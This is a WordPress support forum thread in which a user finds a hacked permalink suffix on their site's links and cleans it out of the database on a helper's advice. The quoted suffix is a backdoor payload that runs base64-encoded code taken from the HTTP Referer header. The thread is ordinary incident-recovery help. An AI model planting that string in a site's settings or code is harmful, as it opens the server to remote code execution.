Hacked? Links are broken

  • Resolved geoff67

    (@geoff67)


    15 years, 7 months ago

    I’ve been trying to fix this for 4 hours now and can’t seem to figure out what’s wrong.

    Dynamically generated links (posts, comments, etc) have the following appended to their ends.
    %&({$eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    I’ve looked at countless hacked threads, php injection solutions, Googled everything I can think of, and I’ve done all of the steps to Hardening WP.

    Any idea what’s going on, or where to look next?

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter geoff67

    (@geoff67)

    Oh, and here’s the link to the website: shafr.org.

    Hummm…I’ve typically seen that in the source code, but it looks like yours may be in the database. Have you looked in wp-config.php to make sure it’s clean?

    Thread Starter geoff67

    (@geoff67)

    wp-config.php is normal. DB stuff at top, keys, table prefix, lang and the wp-settings.php line.

    I would suggest dumping your db and searching it. Typically, this code will be exactly the same, so once you find one instance of it, you can do a search/replace to clean it, then drop your original tables and import your cleaned db. Of course, this will not fix the problem that allowed this in the first place, but it should get you an operational blog back.

    Thread Starter geoff67

    (@geoff67)

    Thanks for the suggestion. I found 38 instances, in 4 variations. Uploading new db now.

    Do you know what would’ve caused this? I don’t want another SQL bug.

    Thread Starter geoff67

    (@geoff67)

    Amazing. That fixed it. Thanks so much, figaro.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Hacked? Links are broken’ is closed to new replies.